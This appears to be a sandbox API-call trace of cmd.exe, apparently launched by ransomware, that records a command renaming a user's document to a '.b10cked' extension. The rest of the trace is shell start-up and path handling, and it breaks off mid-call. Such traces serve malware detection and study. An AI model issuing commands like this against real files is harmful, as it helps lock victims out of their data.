[0134.280] __set_app_type (_Type=0x1) [0134.280] __p__fmode () returned 0x76b331f4 [0134.280] __p__commode () returned 0x76b331fc [0134.280] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0134.280] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0134.280] GetCurrentThreadId () returned 0xb70 [0134.281] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb70) returned 0x38 [0134.281] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0134.281] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0134.281] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.281] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0134.281] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f934 | out: phkResult=0x28f934*=0x0) returned 0x2 [0134.281] VirtualQuery (in: lpAddress=0x28f96b, lpBuffer=0x28f904, dwLength=0x1c | out: lpBuffer=0x28f904*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.281] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f904, dwLength=0x1c | out: lpBuffer=0x28f904*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0134.281] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f904, dwLength=0x1c | out: lpBuffer=0x28f904*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0134.281] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f904, dwLength=0x1c | out: lpBuffer=0x28f904*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.281] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f904, dwLength=0x1c | out: lpBuffer=0x28f904*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0134.281] GetConsoleOutputCP () returned 0x1b5 [0134.281] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.282] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0134.282] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.282] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0134.282] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.282] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0134.282] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.282] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0134.282] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.282] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0134.282] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.282] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0134.283] GetEnvironmentStringsW () returned 0x3901b0* [0134.283] FreeEnvironmentStringsW (penv=0x3901b0) returned 1 [0134.283] GetEnvironmentStringsW () returned 0x3901b0* [0134.283] FreeEnvironmentStringsW (penv=0x3901b0) returned 1 [0134.283] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e8a4 | out: phkResult=0x28e8a4*=0x40) returned 0x0 [0134.283] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x0, lpData=0x28e8b0*=0xe8, lpcbData=0x28e8a8*=0x1000) returned 0x2 [0134.283] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x4, lpData=0x28e8b0*=0x1, lpcbData=0x28e8a8*=0x4) returned 0x0 [0134.283] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x0, lpData=0x28e8b0*=0x1, lpcbData=0x28e8a8*=0x1000) returned 0x2 [0134.283] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x4, lpData=0x28e8b0*=0x0, lpcbData=0x28e8a8*=0x4) returned 0x0 [0134.283] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x4, lpData=0x28e8b0*=0x40, lpcbData=0x28e8a8*=0x4) returned 0x0 [0134.283] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x4, lpData=0x28e8b0*=0x40, lpcbData=0x28e8a8*=0x4) returned 0x0 [0134.284] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x0, lpData=0x28e8b0*=0x40, lpcbData=0x28e8a8*=0x1000) returned 0x2 [0134.284] RegCloseKey (hKey=0x40) returned 0x0 [0134.284] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e8a4 | out: phkResult=0x28e8a4*=0x40) returned 0x0 [0134.284] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x0, lpData=0x28e8b0*=0x40, lpcbData=0x28e8a8*=0x1000) returned 0x2 [0134.284] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x4, lpData=0x28e8b0*=0x1, lpcbData=0x28e8a8*=0x4) returned 0x0 [0134.284] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x0, lpData=0x28e8b0*=0x1, lpcbData=0x28e8a8*=0x1000) returned 0x2 [0134.284] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x4, lpData=0x28e8b0*=0x0, lpcbData=0x28e8a8*=0x4) returned 0x0 [0134.284] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x4, lpData=0x28e8b0*=0x9, lpcbData=0x28e8a8*=0x4) returned 0x0 [0134.284] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x4, lpData=0x28e8b0*=0x9, lpcbData=0x28e8a8*=0x4) returned 0x0 [0134.284] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e8ac, lpData=0x28e8b0, lpcbData=0x28e8a8*=0x1000 | out: lpType=0x28e8ac*=0x0, lpData=0x28e8b0*=0x9, lpcbData=0x28e8a8*=0x1000) returned 0x2 [0134.284] RegCloseKey (hKey=0x40) returned 0x0 [0134.284] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886368 [0134.284] srand (_Seed=0x5b886368) [0134.284] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked\"" [0134.284] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked\"" [0134.284] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.285] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x391910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0134.285] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0134.285] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0134.285] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.285] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0134.285] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0134.285] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0134.285] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0134.285] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0134.285] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0134.285] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0134.285] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0134.285] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0134.286] GetEnvironmentStringsW () returned 0x392300* [0134.286] FreeEnvironmentStringsW (penv=0x392300) returned 1 [0134.286] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.286] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.286] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0134.286] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0134.286] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0134.286] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0134.286] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0134.286] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0134.286] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0134.286] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0134.286] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f670 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.286] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f670, lpFilePart=0x28f66c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f66c*="Desktop") returned 0x18 [0134.286] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0134.287] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f3ec | out: lpFindFileData=0x28f3ec) returned 0x390040 [0134.287] FindClose (in: hFindFile=0x390040 | out: hFindFile=0x390040) returned 1 [0134.287] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f3ec | out: lpFindFileData=0x28f3ec) returned 0x390040 [0134.287] FindClose (in: hFindFile=0x390040 | out: hFindFile=0x390040) returned 1 [0134.287] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f3ec | out: lpFindFileData=0x28f3ec) returned 0x390040 [0134.287] FindClose (in: hFindFile=0x390040 | out: hFindFile=0x390040) returned 1 [0134.287] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0134.288] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0134.288] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0134.288] GetEnvironmentStringsW () returned 0x392b20* [0134.288] FreeEnvironmentStringsW (penv=0x392b20) returned 1 [0134.288] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.289] GetConsoleOutputCP () returned 0x1b5 [0134.289] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.289] GetUserDefaultLCID () returned 0x409 [0134.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0134.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f7b0, cchData=128 | out: lpLCData="0") returned 2 [0134.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f7b0, cchData=128 | out: lpLCData="0") returned 2 [0134.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f7b0, cchData=128 | out: lpLCData="1") returned 2 [0134.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0134.289] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0134.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0134.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0134.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0134.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0134.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0134.290] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0134.290] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0134.290] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0134.290] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0134.291] GetConsoleTitleW (in: lpConsoleTitle=0x380900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.291] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0134.291] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0134.291] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0134.291] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0134.292] _wcsicmp (_String1="move", _String2=")") returned 68 [0134.292] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0134.292] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0134.292] _wcsicmp (_String1="IF", _String2="move") returned -4 [0134.292] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0134.292] _wcsicmp (_String1="REM", _String2="move") returned 5 [0134.292] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0134.296] GetConsoleTitleW (in: lpConsoleTitle=0x28f4a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.382] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0134.382] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0134.382] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0134.382] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0134.382] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0134.382] _wcsicmp (_String1="move", _String2="CD") returned 10 [0134.382] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0134.382] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0134.382] _wcsicmp (_String1="move", _String2="REN") returned -5 [0134.382] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0134.382] _wcsicmp (_String1="move", _String2="SET") returned -6 [0134.382] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0134.382] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0134.382] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0134.382] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0134.382] _wcsicmp (_String1="move", _String2="MD") returned 11 [0134.382] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0134.382] _wcsicmp (_String1="move", _String2="RD") returned -5 [0134.382] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0134.382] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0134.382] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0134.382] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0134.382] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0134.382] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0134.382] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0134.382] _wcsicmp (_String1="move", _String2="VER") returned -9 [0134.382] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0134.382] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0134.382] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0134.383] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0134.383] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0134.383] _wcsicmp (_String1="move", _String2="START") returned -6 [0134.383] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0134.383] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0134.383] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0134.384] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0134.384] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0134.384] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f264, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f25c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f25c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0134.385] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0134.386] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0134.386] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0134.386] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0134.386] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0134.386] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0134.386] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0134.386] _wcsicmp (_String1="TQ3YPK~1.DOC", _String2=".") returned 70 [0134.386] _wcsicmp (_String1="TQ3YPK~1.DOC", _String2="..") returned 70 [0134.386] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\tq3ypk~1.doc")) returned 0x20 [0134.386] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x391e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.386] SetErrorMode (uMode=0x0) returned 0x0 [0134.387] SetErrorMode (uMode=0x1) returned 0x0 [0134.387] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC", nBufferLength=0x104, lpBuffer=0x28ebec, lpFilePart=0x28ebd4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC", lpFilePart=0x28ebd4*="TQ3YPK~1.DOC") returned 0x33 [0134.387] SetErrorMode (uMode=0x0) returned 0x1 [0134.387] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1")) returned 0x10 [0134.387] _wcsicmp (_String1="TQ3YPK~1.DOC", _String2=".") returned 70 [0134.387] _wcsicmp (_String1="TQ3YPK~1.DOC", _String2="..") returned 70 [0134.387] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\tq3ypk~1.doc")) returned 0x20 [0134.387] SetErrorMode (uMode=0x0) returned 0x0 [0134.387] SetErrorMode (uMode=0x1) returned 0x0 [0134.387] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC", nBufferLength=0x104, lpBuffer=0x28f068, lpFilePart=0x28ee00 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC", lpFilePart=0x28ee00*="TQ3YPK~1.DOC") returned 0x33 [0134.387] SetErrorMode (uMode=0x0) returned 0x1 [0134.387] SetErrorMode (uMode=0x0) returned 0x0 [0134.387] SetErrorMode (uMode=0x1) returned 0x0 [0134.388] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked", nBufferLength=0x104, lpBuffer=0x28f270, lpFilePart=0x28ee00 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked", lpFilePart=0x28ee00*="Tq3yPk_6C.docx.b10cked") returned 0x3d [0134.388] SetErrorMode (uMode=0x0) returned 0x1 [0134.388] SetLastError (dwErrCode=0x0) [0134.388] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\tq3ypk_6c.docx.b10cked")) returned 0xffffffff [0134.388] GetLastError () returned 0x2 [0134.388] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x28e77c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e77c) returned 0x380ef0 [0134.388] FindNextFileW (in: hFindFile=0x380ef0, lpFindFileData=0x28e77c | out: lpFindFileData=0x28e77c) returned 0 [0134.389] GetLastError () returned 0x12 [0134.389] FindClose (in: hFindFile=0x380ef0 | out: hFindFile=0x380ef0) returned 1 [0134.390] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC", fInfoLevelId=0x1, lpFindFileData=0x391c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x391c30) returned 0x380ef0 [0134.390] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked", nBufferLength=0x104, lpBuffer=0x28ea14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked", lpFilePart=0x0) returned 0x3d [0134.390] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx", nBufferLength=0x104, lpBuffer=0x28ea14, lpFilePart=0x0 | out: 